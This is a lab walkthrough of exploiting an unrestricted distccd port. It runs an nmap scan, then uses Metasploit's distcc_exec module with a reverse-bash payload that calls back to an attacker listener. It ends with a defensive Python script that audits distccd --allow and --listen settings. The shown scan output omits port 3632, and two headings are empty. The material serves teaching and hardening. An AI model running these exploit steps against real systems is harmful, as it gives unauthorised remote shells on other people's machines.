The Distcc service vulnerability principle:
Distcc distributes the compilation of large codebases across servers on a network. If it is misconfigured, however, it can be abused to execute commands. The vulnerability is present in Xcode 1.5 and other versions of Distcc 2.x because access to the server port is not restricted.
In simple terms, the service does not properly check who connects to its port or what tasks it is asked to run, so attackers can use distributed compilation jobs to execute their own commands.
Vulnerability indexes:
Vulnerability attack module code:
First, start msfconsole to enter the operation interface:
cd ~
msfconsole
Use the Nmap scanning tool to scan the target host for open ports:
nmap -sV -T4 192.168.122.102
Here's an example of the output you might see:
[*] exec: nmap -sV -T4 192.168.122.102
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-30 21:51 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0075s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
53/tcp   open  domain  ISC BIND 9.4.2
111/tcp  open  rpcbind 2 (RPC #100000)
3306/tcp open  mysql   MySQL 5.0.51a-3ubuntu5
MAC Address: 52:54:00:1E:9E:B4 (QEMU virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.41 seconds
Based on the scan results, search for the module corresponding to the port service you want to attack:
search distcc
In the Kali MSF terminal, use the use command to select the appropriate module:
use exploit/unix/misc/distcc_exec
Then, use the show options command to display the module parameters:
show options
Here's an example of the output you might see:
Module options (exploit/unix/misc/distcc_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    3632             yes       The target port (TCP)

Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.28.140.88    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.
Set the target host parameter RHOST to 192.168.122.102:
set RHOST 192.168.122.102
Once everything is set, use the exploit command to attack the host:
exploit
Press Ctrl+D to quit the Metasploit console, then start the inspection.
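The root cause described at the top of this page is a distccd port with no access restrictions. As an added example (not part of the original lab and not distcc's own code), the Python script below audits distccd command lines for a missing or overly broad --allow list and for listening on every interface; the sample command lines and the /16 threshold are assumptions constructed for illustration.

```python
import ipaddress
import shlex

# Constructed sample distccd command lines, as they might appear in `ps` output.
SAMPLES = [
    "distccd --daemon --user daemon",
    "distccd --daemon --allow 0.0.0.0/0 --listen 0.0.0.0",
    "distccd --daemon --allow 10.20.0.0/16 --listen 10.20.0.5 --port 3632",
    "distccd --daemon -a 127.0.0.1 --listen 127.0.0.1",
]
MAX_ADDRESSES = 2 ** 16  # assumed policy: flag --allow ranges wider than a /16

def audit_distccd(cmdline):
    """Return a list of findings for one distccd command line (empty = OK)."""
    args = shlex.split(cmdline)
    allow, listen = [], None
    for i, arg in enumerate(args):
        name, eq, value = arg.partition("=")
        if name not in ("--allow", "-a", "--listen"):
            continue
        if not eq:  # value is the next token, e.g. "--allow 10.0.0.0/8"
            value = args[i + 1] if i + 1 < len(args) else ""
        if name == "--listen":
            listen = value
        else:
            allow.append(value)
    findings = []
    if not allow:
        findings.append("no --allow: any client that reaches the port can submit jobs")
    for spec in allow:
        try:
            net = ipaddress.ip_network(spec, strict=False)
        except ValueError:
            findings.append(f"--allow {spec}: not a valid address or CIDR range")
            continue
        if net.num_addresses > MAX_ADDRESSES:
            findings.append(f"--allow {spec}: range is too broad to act as a restriction")
    try:
        all_ifaces = listen is None or ipaddress.ip_address(listen).is_unspecified
    except ValueError:
        all_ifaces = False  # hostname or other value: not judged here
    if all_ifaces:
        findings.append("listens on all interfaces: bind one address with --listen")
    return findings

if __name__ == "__main__":
    for line in SAMPLES:
        print(line)
        for finding in audit_distccd(line) or ["ok"]:
            print("   ", finding)
```

Restricting --allow and --listen narrows who can reach the service; a host firewall rule on the distccd port (3632 in the module options above) adds a second layer.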